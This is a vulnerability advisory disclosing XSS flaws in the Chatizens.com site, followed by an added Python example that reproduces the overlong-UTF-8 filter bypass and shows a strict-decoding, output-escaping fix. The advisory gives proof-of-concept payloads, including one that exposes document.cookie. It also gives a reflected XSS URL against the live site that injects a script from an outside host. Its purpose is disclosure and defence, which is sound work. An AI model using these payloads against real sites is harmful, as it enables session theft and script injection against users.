Chatizens.com
Also known as Chattown.com
Homepage: http://www.chatizens.com

Affected files:
* Profile input boxes: all input boxes of your profile.
* Browsing the forums

--------------------------------------------
XSS vuln with cookie disclosure via profile input boxes.

To bypass the Chatizens filter, which adds backslashes before ' and ", we use the overlong UTF-8 encoding of ': the filter only escapes the ASCII quote, and the overlong form is decoded back into a real quote after the filter has run.

PoC:
<img src=javascript:alert('XSS')>

And to display our cookie:
<IMG SRC=javascript:alert(document.cookie)>

Screenshot:
http://www.youfucktard.com/xsp/chatizen1.jpg
http://www.youfucktard.com/xsp/chatizen2.jpg

---------------------------------------------
heh, it seems chatizens.com is using a webapp I audited before, Alstrasoft E-Friends.

Screenshot:
http://www.youfucktard.com/xsp/chatizen3.jpg

-------------------------------------------
XSS vuln via viewing forum categories: the seid parameter is reflected into the page without escaping, so a value that closes the surrounding attribute and tag injects a remote script.

http://chatizens.com/friends/index.php?mode=forums&act=viewcat&seid=19">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<"

Screenshot:
http://www.youfucktard.com/xsp/chatizen4.jpg
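The filter bypass used against the profile input boxes above, as an added example that is not part of the advisory and not Chatizens' or E-Friends' code. The byte-wise `addslashes`-style filter and the permissive decoder are assumed reconstructions of the behaviour the advisory describes, not the site's actual code, and the overlong byte sequence 0xC0 0xA7 for ' is an assumption, since the advisory does not spell out the bytes it used. The hardened path (strict UTF-8 decoding that rejects overlong forms, then HTML escaping for the output context) also covers the reflected seid parameter in the forum URL, where the quotes arrive as plain ASCII and escaping alone is what stops the attribute breakout.

```python
# Added example: overlong-UTF-8 bypass of a quote-escaping filter, and the fix.
# Nothing here is code from the advisory or from the vulnerable web application.
import html
from typing import Optional


def addslashes(raw: bytes) -> bytes:
    """Mimic a PHP addslashes()-style filter: backslash-escape ASCII ' " \\ and NUL.
    It works on bytes, so it only ever sees 0x27 and 0x22 as quotes."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def lenient_utf8_decode(raw: bytes) -> str:
    """Hypothetical permissive decoder that accepts overlong two-byte sequences
    (the legacy behaviour that makes the bypass work). Everything else is
    decoded strictly."""
    out = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            # 110xxxxx 10yyyyyy -> code point, with no check that the value
            # actually needed two bytes (that missing check is the bug).
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            n = 3 if 0xE0 <= b <= 0xEF else 4 if 0xF0 <= b <= 0xF7 else 1
            out.append(raw[i:i + n].decode("utf-8"))  # strict for 3/4-byte forms
            i += n
    return "".join(out)


# Assumption: overlong two-byte encoding of U+0027 ('). The advisory does not
# give the exact bytes; this is the classic form of the trick.
OVERLONG_APOS = b"\xc0\xa7"

# Constructed attacker input, modelled on the advisory's PoC, with the ASCII
# apostrophes swapped for the overlong form so the filter never sees 0x27.
PAYLOAD = b"<img src=javascript:alert(" + OVERLONG_APOS + b"XSS" + OVERLONG_APOS + b")>"


def vulnerable_render(raw: bytes) -> str:
    """Filter first, decode second: the overlong bytes slip past addslashes()
    and the lenient decoder then turns them into a real apostrophe."""
    return lenient_utf8_decode(addslashes(raw))


def hardened_render(raw: bytes) -> Optional[str]:
    """Strict UTF-8 decoding (Python's codec rejects overlong sequences), then
    HTML-escape for the output context. Returns None for malformed input; a
    real handler would reject the request rather than try to repair it."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return html.escape(text, quote=True)


if __name__ == "__main__":
    print("vulnerable:", vulnerable_render(PAYLOAD))
    print("hardened  :", hardened_render(PAYLOAD))
    print("hardened, ASCII quotes:", hardened_render(b"<img src=javascript:alert('XSS')>"))
```

The order of operations is the whole vulnerability: escaping happens on the raw bytes while the decode that produces the quote happens later, so the filter is checking a representation the browser never sees. Decoding strictly before any filtering removes the overlong form, and escaping on output (rather than trying to neutralise quotes on input) is what makes the reflected forum parameter safe as well.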